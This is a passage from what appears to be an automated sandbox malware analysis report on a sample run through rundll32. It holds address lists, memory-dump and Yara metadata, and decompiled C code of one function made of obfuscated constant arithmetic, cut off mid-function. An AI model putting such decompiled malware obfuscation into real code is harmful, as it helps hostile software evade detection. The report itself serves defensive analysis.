                                                                                                                                                            0x003852f5
                                                                                                                                                            0x003852f8
                                                                                                                                                            0x003852ff
                                                                                                                                                            0x0038530a
                                                                                                                                                            0x00385315
                                                                                                                                                            0x0038531d
                                                                                                                                                            0x00385322
                                                                                                                                                            0x0038532a
                                                                                                                                                            0x00385332
                                                                                                                                                            0x0038533a
                                                                                                                                                            0x00385345
                                                                                                                                                            0x00385350
                                                                                                                                                            0x0038535b
                                                                                                                                                            0x00385366
                                                                                                                                                            0x00385379
                                                                                                                                                            0x00385380
                                                                                                                                                            0x0038538b
                                                                                                                                                            0x00385393
                                                                                                                                                            0x00385398
                                                                                                                                                            0x003853a5
                                                                                                                                                            0x003853a9
                                                                                                                                                            0x003853b1
                                                                                                                                                            0x003853bc
                                                                                                                                                            0x003853c7
                                                                                                                                                            0x003853d2
                                                                                                                                                            0x003853dd
                                                                                                                                                            0x003853e5
                                                                                                                                                            0x003853ea
                                                                                                                                                            0x003853f7
                                                                                                                                                            0x003853fb
                                                                                                                                                            0x00385403
                                                                                                                                                            0x0038540e
                                                                                                                                                            0x00385416
                                                                                                                                                            0x00385421
                                                                                                                                                            0x0038542c
                                                                                                                                                            0x0038543f
                                                                                                                                                            0x00385446
                                                                                                                                                            0x00385451
                                                                                                                                                            0x00385459
                                                                                                                                                            0x00385463
                                                                                                                                                            0x0038546c
                                                                                                                                                            0x00385470
                                                                                                                                                            0x00385478
                                                                                                                                                            0x00385483
                                                                                                                                                            0x0038548b
                                                                                                                                                            0x00385496
                                                                                                                                                            0x0038549e
                                                                                                                                                            0x003854a3
                                                                                                                                                            0x003854ab
                                                                                                                                                            0x003854b3
                                                                                                                                                            0x003854bb
                                                                                                                                                            0x003854c6
                                                                                                                                                            0x003854d1
                                                                                                                                                            0x003854dc
                                                                                                                                                            0x003854e7
                                                                                                                                                            0x003854f2
                                                                                                                                                            0x003854fa
                                                                                                                                                            0x00385505
                                                                                                                                                            0x00385510
                                                                                                                                                            0x0038551b
                                                                                                                                                            0x00385523
                                                                                                                                                            0x0038552e
                                                                                                                                                            0x0038553e
                                                                                                                                                            0x00385546
                                                                                                                                                            0x0038554e
                                                                                                                                                            0x00385556
                                                                                                                                                            0x00385568
                                                                                                                                                            0x00385570
                                                                                                                                                            0x00385578
                                                                                                                                                            0x00385580
                                                                                                                                                            0x0038558b
                                                                                                                                                            0x00385596
                                                                                                                                                            0x003855a1
                                                                                                                                                            0x003855ac
                                                                                                                                                            0x003855c1
                                                                                                                                                            0x003855c2
                                                                                                                                                            0x003855d1
                                                                                                                                                            0x003855d8
                                                                                                                                                            0x003855e3
                                                                                                                                                            0x003855f6
                                                                                                                                                            0x003855fd
                                                                                                                                                            0x00385608
                                                                                                                                                            0x00385613
                                                                                                                                                            0x0038561e
                                                                                                                                                            0x00385629
                                                                                                                                                            0x00385634
                                                                                                                                                            0x0038563f
                                                                                                                                                            0x0038564a
                                                                                                                                                            0x0038565a
                                                                                                                                                            0x00385661
                                                                                                                                                            0x0038566c
                                                                                                                                                            0x00385677
                                                                                                                                                            0x0038567f
                                                                                                                                                            0x0038568a
                                                                                                                                                            0x00385695
                                                                                                                                                            0x003856a8
                                                                                                                                                            0x003856af
                                                                                                                                                            0x003856ba
                                                                                                                                                            0x003856c2
                                                                                                                                                            0x003856d0
                                                                                                                                                            0x003856d4
                                                                                                                                                            0x003856dc
                                                                                                                                                            0x003856e4

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FolderPath
                                                                                                                                                            • String ID: -X$8ZD$8ZD$:%$>`U$@Y$DIn $G4%>$R@$[z}~$_p$e3c$noz$xO4$~wP`$!=$'$zQ5
                                                                                                                                                            • API String ID: 1514166925-4215140744
                                                                                                                                                            • Opcode ID: 15f43f0d5e061011eebbd583d404d2d83b88f7fd3322d2357593756b2abfbb9d
                                                                                                                                                            • Instruction ID: 1128dbba12a79d3b0d79841270463f8f91caba26a3f82930a4150649be85595f
                                                                                                                                                            • Opcode Fuzzy Hash: 15f43f0d5e061011eebbd583d404d2d83b88f7fd3322d2357593756b2abfbb9d
                                                                                                                                                            • Instruction Fuzzy Hash: 6A72FF714083819FD3B9CF25C58AB9BBBE1BBC4318F108A1DE1DA96260D7B58949CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                            			E00382550() {
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				char _v36;
                                                                                                                                                            				char _v84;
                                                                                                                                                            				signed int _v100;
                                                                                                                                                            				signed int _v104;
                                                                                                                                                            				signed int _v112;
                                                                                                                                                            				signed int _v124;
                                                                                                                                                            				signed int _v140;
                                                                                                                                                            				intOrPtr _v144;
                                                                                                                                                            				char _v152;
                                                                                                                                                            				signed int _v172;
                                                                                                                                                            				char _v180;
                                                                                                                                                            				char _v188;
                                                                                                                                                            				char _v192;
                                                                                                                                                            				char _v196;
                                                                                                                                                            				char _v200;
                                                                                                                                                            				char _v204;
                                                                                                                                                            				signed int _v208;
                                                                                                                                                            				signed int _v212;
                                                                                                                                                            				signed int _v216;
                                                                                                                                                            				signed int _v220;
                                                                                                                                                            				signed int _v224;
                                                                                                                                                            				signed int _v228;
                                                                                                                                                            				signed int _v232;
                                                                                                                                                            				signed int _v236;
                                                                                                                                                            				signed int _v240;
                                                                                                                                                            				signed int _v244;
                                                                                                                                                            				signed int _v248;
                                                                                                                                                            				signed int _v252;
                                                                                                                                                            				signed int _v256;
                                                                                                                                                            				signed int _v260;
                                                                                                                                                            				signed int _v264;
                                                                                                                                                            				signed int _v268;
                                                                                                                                                            				signed int _v272;
                                                                                                                                                            				signed int _v276;
                                                                                                                                                            				signed int _v280;
                                                                                                                                                            				signed int _v284;
                                                                                                                                                            				signed int _v288;
                                                                                                                                                            				unsigned int _v292;
                                                                                                                                                            				signed int _v296;
                                                                                                                                                            				signed int _v300;
                                                                                                                                                            				signed int _v304;
                                                                                                                                                            				signed int _v308;
                                                                                                                                                            				signed int _v312;
                                                                                                                                                            				signed int _v316;
                                                                                                                                                            				signed int _v320;
                                                                                                                                                            				signed int _v324;
                                                                                                                                                            				signed int _v328;
                                                                                                                                                            				signed int _v332;
                                                                                                                                                            				signed int _v336;
                                                                                                                                                            				signed int _v340;
                                                                                                                                                            				signed int _v344;
                                                                                                                                                            				signed int _v348;
                                                                                                                                                            				signed int _v352;
                                                                                                                                                            				signed int _v356;
                                                                                                                                                            				signed int _v360;
                                                                                                                                                            				signed int _v364;
                                                                                                                                                            				signed int _v368;
                                                                                                                                                            				signed int _v372;
                                                                                                                                                            				signed int _v376;
                                                                                                                                                            				signed int _v380;
                                                                                                                                                            				signed int _v384;
                                                                                                                                                            				signed int _v388;
                                                                                                                                                            				signed int _v392;
                                                                                                                                                            				unsigned int _v396;
                                                                                                                                                            				signed int _v400;
                                                                                                                                                            				signed int _v404;
                                                                                                                                                            				signed int _v408;
                                                                                                                                                            				signed int _v412;
                                                                                                                                                            				signed int _v416;
                                                                                                                                                            				signed int _v420;
                                                                                                                                                            				signed int _v424;
                                                                                                                                                            				signed int _v428;
                                                                                                                                                            				signed int _v432;
                                                                                                                                                            				signed int _v436;
                                                                                                                                                            				signed int _v440;
                                                                                                                                                            				signed int _v444;
                                                                                                                                                            				signed int _v448;
                                                                                                                                                            				signed int _v452;
                                                                                                                                                            				signed int _v456;
                                                                                                                                                            				signed int _v460;
                                                                                                                                                            				signed int _v464;
                                                                                                                                                            				signed int _v468;
                                                                                                                                                            				signed int _v472;
                                                                                                                                                            				signed int _v476;
                                                                                                                                                            				signed int _v480;
                                                                                                                                                            				unsigned int _v484;
                                                                                                                                                            				unsigned int _v488;
                                                                                                                                                            				signed int _v492;
                                                                                                                                                            				signed int _v496;
                                                                                                                                                            				signed int _v500;
                                                                                                                                                            				signed int _v504;
                                                                                                                                                            				signed int _v508;
                                                                                                                                                            				unsigned int _v512;
                                                                                                                                                            				signed int _v516;
                                                                                                                                                            				signed int _v520;
                                                                                                                                                            				signed int _v524;
                                                                                                                                                            				signed int _v528;
                                                                                                                                                            				unsigned int _v532;
                                                                                                                                                            				signed int _v536;
                                                                                                                                                            				signed int _v540;
                                                                                                                                                            				unsigned int _v544;
                                                                                                                                                            				signed int _v548;
                                                                                                                                                            				unsigned int _v552;
                                                                                                                                                            				signed int _v556;
                                                                                                                                                            				signed int _v560;
                                                                                                                                                            				signed int _v564;
                                                                                                                                                            				signed int _v568;
                                                                                                                                                            				signed int _v572;
                                                                                                                                                            				unsigned int _v576;
                                                                                                                                                            				signed int _v580;
                                                                                                                                                            				signed int _v584;
                                                                                                                                                            				unsigned int _v588;
                                                                                                                                                            				unsigned int _v592;
                                                                                                                                                            				signed int _v596;
                                                                                                                                                            				signed int _v600;
                                                                                                                                                            				signed int _v604;
                                                                                                                                                            				signed int _v608;
                                                                                                                                                            				signed int _v612;
                                                                                                                                                            				signed int _v616;
                                                                                                                                                            				signed int _v620;
                                                                                                                                                            				signed int _v624;
                                                                                                                                                            				signed int _v628;
                                                                                                                                                            				signed int _v632;
                                                                                                                                                            				signed int _v636;
                                                                                                                                                            				signed int _t1114;
                                                                                                                                                            				signed int _t1118;
                                                                                                                                                            				signed int _t1122;
                                                                                                                                                            				signed int _t1124;
                                                                                                                                                            				signed int _t1125;
                                                                                                                                                            				signed int _t1130;
                                                                                                                                                            				void* _t1134;
                                                                                                                                                            				signed int _t1141;
                                                                                                                                                            				signed int _t1190;
                                                                                                                                                            				signed int _t1191;
                                                                                                                                                            				signed int _t1193;
                                                                                                                                                            				signed int _t1194;
                                                                                                                                                            				signed int _t1195;
                                                                                                                                                            				signed int _t1196;
                                                                                                                                                            				signed int _t1197;
                                                                                                                                                            				signed int _t1198;
                                                                                                                                                            				signed int _t1199;
                                                                                                                                                            				signed int _t1200;
                                                                                                                                                            				signed int _t1201;
                                                                                                                                                            				signed int _t1202;
                                                                                                                                                            				signed int _t1203;
                                                                                                                                                            				signed int _t1204;
                                                                                                                                                            				signed int _t1205;
                                                                                                                                                            				signed int _t1206;
                                                                                                                                                            				signed int _t1207;
                                                                                                                                                            				signed int _t1208;
                                                                                                                                                            				signed int _t1209;
                                                                                                                                                            				signed int _t1210;
                                                                                                                                                            				signed int _t1211;
                                                                                                                                                            				signed int _t1212;
                                                                                                                                                            				signed int _t1213;
                                                                                                                                                            				signed int _t1214;
                                                                                                                                                            				signed int _t1215;
                                                                                                                                                            				signed int _t1313;
                                                                                                                                                            				signed int _t1314;
                                                                                                                                                            				signed int _t1317;
                                                                                                                                                            				signed int _t1343;
                                                                                                                                                            				void* _t1345;
                                                                                                                                                            				void* _t1348;
                                                                                                                                                            				void* _t1349;
                                                                                                                                                            				void* _t1350;
                                                                                                                                                            
                                                                                                                                                            				_t1345 = (_t1343 & 0xfffffff8) - 0x278;
                                                                                                                                                            				_v372 = 0xaca17;
                                                                                                                                                            				_v372 = _v372 << 9;
                                                                                                                                                            				_v372 = _v372 ^ 0xc9927700;
                                                                                                                                                            				_v372 = _v372 ^ 0xdc065802;
                                                                                                                                                            				_v560 = 0xa158a0;
                                                                                                                                                            				_v560 = _v560 + 0xffff5dcd;
                                                                                                                                                            				_v560 = _v560 ^ 0x175bafac;
                                                                                                                                                            				_v560 = _v560 + 0xffff9e49;
                                                                                                                                                            				_v560 = _v560 ^ 0x17fab80a;
                                                                                                                                                            				_v288 = 0xd4a9a6;
                                                                                                                                                            				_v288 = _v288 >> 3;
                                                                                                                                                            				_v288 = _v288 ^ 0x001a9534;
                                                                                                                                                            				_v504 = 0xe9a5d3;
                                                                                                                                                            				_v504 = _v504 << 0xa;
                                                                                                                                                            				_v504 = _v504 | 0xea5982c0;
                                                                                                                                                            				_t1190 = 0x5f;
                                                                                                                                                            				_v504 = _v504 / _t1190;
                                                                                                                                                            				_v504 = _v504 ^ 0x028f5db6;
                                                                                                                                                            				_t1317 = 0x5d794ec;
                                                                                                                                                            				_v304 = 0x85b0a3;
                                                                                                                                                            				_v304 = _v304 | 0x2bca024a;
                                                                                                                                                            				_v304 = _v304 ^ 0x2bcc012b;
                                                                                                                                                            				_v556 = 0x1ecc82;
                                                                                                                                                            				_v556 = _v556 | 0xf08df0d8;
                                                                                                                                                            				_v556 = _v556 + 0xa531;
                                                                                                                                                            				_v556 = _v556 ^ 0xfe698427;
                                                                                                                                                            				_v556 = _v556 ^ 0x0ecdaa65;
                                                                                                                                                            				_v300 = 0x8f610e;
                                                                                                                                                            				_v300 = _v300 + 0xfe33;
                                                                                                                                                            				_v300 = _v300 ^ 0x0094e207;
                                                                                                                                                            				_v600 = 0x1cab4a;
                                                                                                                                                            				_t1193 = 0x18;
                                                                                                                                                            				_v600 = _v600 / _t1193;
                                                                                                                                                            				_v600 = _v600 + 0xffff3801;
                                                                                                                                                            				_v600 = _v600 + 0x515c;
                                                                                                                                                            				_v600 = _v600 ^ 0x0001e7c9;
                                                                                                                                                            				_v568 = 0xbab742;
                                                                                                                                                            				_v568 = _v568 + 0xcc5d;
                                                                                                                                                            				_v568 = _v568 | 0x5c48aa02;
                                                                                                                                                            				_t1194 = 0x5e;
                                                                                                                                                            				_v568 = _v568 / _t1194;
                                                                                                                                                            				_v568 = _v568 ^ 0x00f9db2d;
                                                                                                                                                            				_v576 = 0x767b63;
                                                                                                                                                            				_v576 = _v576 >> 3;
                                                                                                                                                            				_v576 = _v576 + 0xd487;
                                                                                                                                                            				_v576 = _v576 >> 0x10;
                                                                                                                                                            				_v576 = _v576 ^ 0x00061026;
                                                                                                                                                            				_v628 = 0xe4759e;
                                                                                                                                                            				_v628 = _v628 ^ 0xa26bb658;
                                                                                                                                                            				_v628 = _v628 * 0x1d;
                                                                                                                                                            				_v628 = _v628 ^ 0xba259216;
                                                                                                                                                            				_v628 = _v628 ^ 0xd068fc76;
                                                                                                                                                            				_v500 = 0xe51d81;
                                                                                                                                                            				_v500 = _v500 >> 7;
                                                                                                                                                            				_v500 = _v500 + 0xc085;
                                                                                                                                                            				_v500 = _v500 * 0x6e;
                                                                                                                                                            				_v500 = _v500 ^ 0x01113a52;
                                                                                                                                                            				_v512 = 0xc902c8;
                                                                                                                                                            				_v512 = _v512 >> 3;
                                                                                                                                                            				_v512 = _v512 >> 3;
                                                                                                                                                            				_v512 = _v512 >> 7;
                                                                                                                                                            				_v512 = _v512 ^ 0x0003c164;
                                                                                                                                                            				_v532 = 0xda62af;
                                                                                                                                                            				_v532 = _v532 ^ 0x7c695b99;
                                                                                                                                                            				_v532 = _v532 >> 0xd;
                                                                                                                                                            				_v532 = _v532 >> 6;
                                                                                                                                                            				_v532 = _v532 ^ 0x0009f043;
                                                                                                                                                            				_v604 = 0x69f539;
                                                                                                                                                            				_v604 = _v604 << 0xd;
                                                                                                                                                            				_v604 = _v604 + 0xffffd530;
                                                                                                                                                            				_v604 = _v604 + 0xffffaf77;
                                                                                                                                                            				_v604 = _v604 ^ 0x3ead80db;
                                                                                                                                                            				_v384 = 0xab9f19;
                                                                                                                                                            				_t1195 = 0xf;
                                                                                                                                                            				_t1313 = 0x50;
                                                                                                                                                            				_v384 = _v384 * 0x15;
                                                                                                                                                            				_v384 = _v384 * 9;
                                                                                                                                                            				_v384 = _v384 ^ 0x7eb18135;
                                                                                                                                                            				_v256 = 0xb5a6bd;
                                                                                                                                                            				_v256 = _v256 | 0x1f71a96d;
                                                                                                                                                            				_v256 = _v256 ^ 0x1ffe1878;
                                                                                                                                                            				_v264 = 0xca80f7;
                                                                                                                                                            				_v264 = _v264 ^ 0x226a3f90;
                                                                                                                                                            				_v264 = _v264 ^ 0x22af4e12;
                                                                                                                                                            				_v432 = 0x1b5a57;
                                                                                                                                                            				_v432 = _v432 << 0xa;
                                                                                                                                                            				_v432 = _v432 | 0x8c1547fb;
                                                                                                                                                            				_v432 = _v432 ^ 0xed77fd98;
                                                                                                                                                            				_v312 = 0xf59d00;
                                                                                                                                                            				_v312 = _v312 | 0xee7978e1;
                                                                                                                                                            				_v312 = _v312 ^ 0xeef23383;
                                                                                                                                                            				_v608 = 0x388a49;
                                                                                                                                                            				_v608 = _v608 ^ 0x20b0147d;
                                                                                                                                                            				_v608 = _v608 | 0x120a0452;
                                                                                                                                                            				_v608 = _v608 / _t1195;
                                                                                                                                                            				_v608 = _v608 ^ 0x035d442e;
                                                                                                                                                            				_v632 = 0x8bfb5e;
                                                                                                                                                            				_v632 = _v632 / _t1313;
                                                                                                                                                            				_v632 = _v632 | 0x8005d6ab;
                                                                                                                                                            				_v632 = _v632 + 0xbf6f;
                                                                                                                                                            				_v632 = _v632 ^ 0x80035879;
                                                                                                                                                            				_v624 = 0xe5ec6;
                                                                                                                                                            				_v624 = _v624 << 2;
                                                                                                                                                            				_v624 = _v624 >> 9;
                                                                                                                                                            				_v624 = _v624 | 0xadaec6d6;
                                                                                                                                                            				_v624 = _v624 ^ 0xada90310;
                                                                                                                                                            				_v392 = 0x144ef;
                                                                                                                                                            				_t1196 = 0x44;
                                                                                                                                                            				_v392 = _v392 / _t1196;
                                                                                                                                                            				_v392 = _v392 + 0xc90b;
                                                                                                                                                            				_v392 = _v392 ^ 0x0000cf97;
                                                                                                                                                            				_v236 = 0xf3d10d;
                                                                                                                                                            				_t1197 = 0x4a;
                                                                                                                                                            				_v236 = _v236 * 0x7a;
                                                                                                                                                            				_v236 = _v236 ^ 0x74330487;
                                                                                                                                                            				_v324 = 0xc3c34b;
                                                                                                                                                            				_v324 = _v324 * 0x6c;
                                                                                                                                                            				_v324 = _v324 ^ 0x529af392;
                                                                                                                                                            				_v520 = 0x2a70ca;
                                                                                                                                                            				_v520 = _v520 / _t1197;
                                                                                                                                                            				_v520 = _v520 >> 4;
                                                                                                                                                            				_v520 = _v520 ^ 0x2a4d5a72;
                                                                                                                                                            				_v520 = _v520 ^ 0x2a4dbf28;
                                                                                                                                                            				_v340 = 0xc9c056;
                                                                                                                                                            				_t1198 = 7;
                                                                                                                                                            				_v340 = _v340 * 0x23;
                                                                                                                                                            				_v340 = _v340 | 0xe2238341;
                                                                                                                                                            				_v340 = _v340 ^ 0xfbb710ef;
                                                                                                                                                            				_v248 = 0x9a54c0;
                                                                                                                                                            				_v248 = _v248 | 0xe08ac880;
                                                                                                                                                            				_v248 = _v248 ^ 0xe09bcbd4;
                                                                                                                                                            				_v348 = 0xe0760;
                                                                                                                                                            				_v348 = _v348 << 7;
                                                                                                                                                            				_v348 = _v348 + 0x49a3;
                                                                                                                                                            				_v348 = _v348 ^ 0x070edb7d;
                                                                                                                                                            				_v356 = 0xf94015;
                                                                                                                                                            				_v356 = _v356 * 0x4d;
                                                                                                                                                            				_v356 = _v356 << 1;
                                                                                                                                                            				_v356 = _v356 ^ 0x95f7b4be;
                                                                                                                                                            				_v320 = 0x1268a5;
                                                                                                                                                            				_v320 = _v320 / _t1198;
                                                                                                                                                            				_v320 = _v320 ^ 0x00080ceb;
                                                                                                                                                            				_v396 = 0xbdcf3e;
                                                                                                                                                            				_t1199 = 0x4b;
                                                                                                                                                            				_v396 = _v396 * 0x4d;
                                                                                                                                                            				_v396 = _v396 >> 2;
                                                                                                                                                            				_v396 = _v396 ^ 0x0e48dd39;
                                                                                                                                                            				_v596 = 0x7780dd;
                                                                                                                                                            				_v596 = _v596 << 0xd;
                                                                                                                                                            				_v596 = _v596 | 0xdff7e7fd;
                                                                                                                                                            				_v596 = _v596 ^ 0xfff000ad;
                                                                                                                                                            				_v492 = 0x5c66b3;
                                                                                                                                                            				_v492 = _v492 * 0x2a;
                                                                                                                                                            				_v492 = _v492 ^ 0xe8f32aee;
                                                                                                                                                            				_v492 = _v492 >> 0xd;
                                                                                                                                                            				_v492 = _v492 ^ 0x000eb956;
                                                                                                                                                            				_v316 = 0x3e4fae;
                                                                                                                                                            				_v316 = _v316 >> 3;
                                                                                                                                                            				_v316 = _v316 ^ 0x00075837;
                                                                                                                                                            				_v344 = 0xe0dcd8;
                                                                                                                                                            				_v344 = _v344 >> 1;
                                                                                                                                                            				_v344 = _v344 + 0xffff4400;
                                                                                                                                                            				_v344 = _v344 ^ 0x0066aca9;
                                                                                                                                                            				_v460 = 0xbe16e8;
                                                                                                                                                            				_v460 = _v460 * 0x45;
                                                                                                                                                            				_v460 = _v460 ^ 0x56f71a5b;
                                                                                                                                                            				_v460 = _v460 / _t1199;
                                                                                                                                                            				_v460 = _v460 ^ 0x0158823c;
                                                                                                                                                            				_v588 = 0x54b44f;
                                                                                                                                                            				_v588 = _v588 ^ 0xc5cf08f3;
                                                                                                                                                            				_v588 = _v588 ^ 0x4b1db793;
                                                                                                                                                            				_v588 = _v588 >> 0xb;
                                                                                                                                                            				_v588 = _v588 ^ 0x00183ace;
                                                                                                                                                            				_v524 = 0xbfc9bb;
                                                                                                                                                            				_t1200 = 0x67;
                                                                                                                                                            				_v524 = _v524 * 0x4d;
                                                                                                                                                            				_v524 = _v524 * 0x71;
                                                                                                                                                            				_v524 = _v524 << 1;
                                                                                                                                                            				_v524 = _v524 ^ 0xed1ab829;
                                                                                                                                                            				_v376 = 0x55c29;
                                                                                                                                                            				_v376 = _v376 << 0xc;
                                                                                                                                                            				_v376 = _v376 ^ 0xdae248eb;
                                                                                                                                                            				_v376 = _v376 ^ 0x8f2c7d73;
                                                                                                                                                            				_v424 = 0x330008;
                                                                                                                                                            				_v424 = _v424 << 0xb;
                                                                                                                                                            				_v424 = _v424 / _t1200;
                                                                                                                                                            				_v424 = _v424 ^ 0x017d7462;
                                                                                                                                                            				_v580 = 0xb4c97;
                                                                                                                                                            				_v580 = _v580 | 0x569d8b1e;
                                                                                                                                                            				_v580 = _v580 >> 1;
                                                                                                                                                            				_t1201 = 3;
                                                                                                                                                            				_v580 = _v580 / _t1201;
                                                                                                                                                            				_v580 = _v580 ^ 0x0e68230a;
                                                                                                                                                            				_v328 = 0x695dff;
                                                                                                                                                            				_v328 = _v328 ^ 0x424f14af;
                                                                                                                                                            				_v328 = _v328 ^ 0x4224025c;
                                                                                                                                                            				_v284 = 0xae8351;
                                                                                                                                                            				_t1202 = 0x57;
                                                                                                                                                            				_v284 = _v284 * 0x60;
                                                                                                                                                            				_v284 = _v284 ^ 0x417e5081;
                                                                                                                                                            				_v444 = 0x78eba1;
                                                                                                                                                            				_v444 = _v444 * 0x5f;
                                                                                                                                                            				_v444 = _v444 ^ 0x00193e0b;
                                                                                                                                                            				_v444 = _v444 ^ 0x2cc98685;
                                                                                                                                                            				_v592 = 0x15a443;
                                                                                                                                                            				_v592 = _v592 / _t1202;
                                                                                                                                                            				_v592 = _v592 + 0xffff9c6f;
                                                                                                                                                            				_v592 = _v592 >> 5;
                                                                                                                                                            				_v592 = _v592 ^ 0x07f20231;
                                                                                                                                                            				_v216 = 0x5d0672;
                                                                                                                                                            				_v216 = _v216 << 3;
                                                                                                                                                            				_v216 = _v216 ^ 0x02ee7d7e;
                                                                                                                                                            				_v548 = 0xb50861;
                                                                                                                                                            				_v548 = _v548 >> 0xc;
                                                                                                                                                            				_v548 = _v548 << 0xf;
                                                                                                                                                            				_v548 = _v548 + 0xffffef54;
                                                                                                                                                            				_v548 = _v548 ^ 0x05ac6923;
                                                                                                                                                            				_v452 = 0x2163b6;
                                                                                                                                                            				_v452 = _v452 | 0xbb60e7c3;
                                                                                                                                                            				_v452 = _v452 ^ 0x0d3b8c6d;
                                                                                                                                                            				_v452 = _v452 ^ 0xb65710e5;
                                                                                                                                                            				_v636 = 0x61f3a7;
                                                                                                                                                            				_v636 = _v636 + 0xffff300f;
                                                                                                                                                            				_v636 = _v636 << 1;
                                                                                                                                                            				_v636 = _v636 * 0x27;
                                                                                                                                                            				_v636 = _v636 ^ 0x1d9bc7e7;
                                                                                                                                                            				_v224 = 0x725254;
                                                                                                                                                            				_v224 = _v224 + 0xfffffac1;
                                                                                                                                                            				_v224 = _v224 ^ 0x007e9bc6;
                                                                                                                                                            				_v228 = 0xd6200c;
                                                                                                                                                            				_v228 = _v228 ^ 0x5ef32346;
                                                                                                                                                            				_v228 = _v228 ^ 0x5e2a0e2d;
                                                                                                                                                            				_v540 = 0xc12668;
                                                                                                                                                            				_v540 = _v540 << 8;
                                                                                                                                                            				_v540 = _v540 * 0x51;
                                                                                                                                                            				_v540 = _v540 + 0xffff6981;
                                                                                                                                                            				_v540 = _v540 ^ 0x1d2c502d;
                                                                                                                                                            				_v496 = 0x68726f;
                                                                                                                                                            				_v496 = _v496 + 0xb8c4;
                                                                                                                                                            				_v496 = _v496 + 0xffff3269;
                                                                                                                                                            				_v496 = _v496 << 1;
                                                                                                                                                            				_v496 = _v496 ^ 0x00d37668;
                                                                                                                                                            				_v296 = 0x65f16b;
                                                                                                                                                            				_v296 = _v296 ^ 0xac840f83;
                                                                                                                                                            				_v296 = _v296 ^ 0xace8f4ad;
                                                                                                                                                            				_v336 = 0xf34185;
                                                                                                                                                            				_v336 = _v336 + 0xffff7084;
                                                                                                                                                            				_v336 = _v336 ^ 0x22f89925;
                                                                                                                                                            				_v336 = _v336 ^ 0x2207d32f;
                                                                                                                                                            				_v400 = 0x9220b0;
                                                                                                                                                            				_v400 = _v400 | 0xa2c46701;
                                                                                                                                                            				_v400 = _v400 + 0x1a14;
                                                                                                                                                            				_v400 = _v400 ^ 0xa2d5ce26;
                                                                                                                                                            				_v368 = 0x18190f;
                                                                                                                                                            				_v368 = _v368 * 0x6c;
                                                                                                                                                            				_t1203 = 0x47;
                                                                                                                                                            				_v368 = _v368 * 0x49;
                                                                                                                                                            				_v368 = _v368 ^ 0xe62bbbec;
                                                                                                                                                            				_v276 = 0x664929;
                                                                                                                                                            				_v276 = _v276 + 0xffffab3c;
                                                                                                                                                            				_v276 = _v276 ^ 0x0066f8be;
                                                                                                                                                            				_v420 = 0x55fac4;
                                                                                                                                                            				_v420 = _v420 / _t1203;
                                                                                                                                                            				_v420 = _v420 | 0x23698c02;
                                                                                                                                                            				_v420 = _v420 ^ 0x23676b12;
                                                                                                                                                            				_v428 = 0x2d8f3d;
                                                                                                                                                            				_v428 = _v428 ^ 0xcbbc8554;
                                                                                                                                                            				_v428 = _v428 + 0xffff5f5b;
                                                                                                                                                            				_v428 = _v428 ^ 0xcb969d3b;
                                                                                                                                                            				_v408 = 0x7d0ed3;
                                                                                                                                                            				_t1204 = 0x33;
                                                                                                                                                            				_v408 = _v408 / _t1204;
                                                                                                                                                            				_v408 = _v408 ^ 0x03ccba73;
                                                                                                                                                            				_v408 = _v408 ^ 0x03c41a74;
                                                                                                                                                            				_v212 = 0xf1bcf;
                                                                                                                                                            				_v212 = _v212 | 0xafbe7d4b;
                                                                                                                                                            				_v212 = _v212 ^ 0xafbe5483;
                                                                                                                                                            				_v476 = 0x76a0ac;
                                                                                                                                                            				_v476 = _v476 << 0xa;
                                                                                                                                                            				_v476 = _v476 << 2;
                                                                                                                                                            				_v476 = _v476 >> 6;
                                                                                                                                                            				_v476 = _v476 ^ 0x01aadd1c;
                                                                                                                                                            				_v252 = 0xacd74c;
                                                                                                                                                            				_v252 = _v252 + 0xffffc13c;
                                                                                                                                                            				_v252 = _v252 ^ 0x00a0cd5e;
                                                                                                                                                            				_v232 = 0x48ff42;
                                                                                                                                                            				_t1205 = 0x1a;
                                                                                                                                                            				_v232 = _v232 / _t1205;
                                                                                                                                                            				_v232 = _v232 ^ 0x0005b06f;
                                                                                                                                                            				_v620 = 0x68b0f8;
                                                                                                                                                            				_v620 = _v620 | 0x9e72bceb;
                                                                                                                                                            				_v620 = _v620 ^ 0x53ebce50;
                                                                                                                                                            				_v620 = _v620 + 0x60e9;
                                                                                                                                                            				_v620 = _v620 ^ 0xcd9386df;
                                                                                                                                                            				_v572 = 0xa5dd6d;
                                                                                                                                                            				_v572 = _v572 << 0xb;
                                                                                                                                                            				_t1206 = 0x6b;
                                                                                                                                                            				_v572 = _v572 / _t1206;
                                                                                                                                                            				_v572 = _v572 + 0xe547;
                                                                                                                                                            				_v572 = _v572 ^ 0x00701f50;
                                                                                                                                                            				_v516 = 0x27ee1e;
                                                                                                                                                            				_v516 = _v516 + 0x5114;
                                                                                                                                                            				_v516 = _v516 ^ 0xd07a9b41;
                                                                                                                                                            				_v516 = _v516 ^ 0x4a8a2a52;
                                                                                                                                                            				_v516 = _v516 ^ 0x9ad4de84;
                                                                                                                                                            				_v484 = 0xc04b63;
                                                                                                                                                            				_v484 = _v484 >> 3;
                                                                                                                                                            				_v484 = _v484 >> 4;
                                                                                                                                                            				_v484 = _v484 + 0xffff6956;
                                                                                                                                                            				_v484 = _v484 ^ 0x000f5fa9;
                                                                                                                                                            				_v416 = 0x10eb88;
                                                                                                                                                            				_v416 = _v416 | 0xd8fa91ef;
                                                                                                                                                            				_v416 = _v416 ^ 0xf957ef44;
                                                                                                                                                            				_v416 = _v416 ^ 0x21a34ff6;
                                                                                                                                                            				_v412 = 0xf4f2f5;
                                                                                                                                                            				_v412 = _v412 + 0xffff8ffc;
                                                                                                                                                            				_v412 = _v412 + 0xffff7090;
                                                                                                                                                            				_v412 = _v412 ^ 0x00f029cf;
                                                                                                                                                            				_v268 = 0xc7943e;
                                                                                                                                                            				_v268 = _v268 << 0x10;
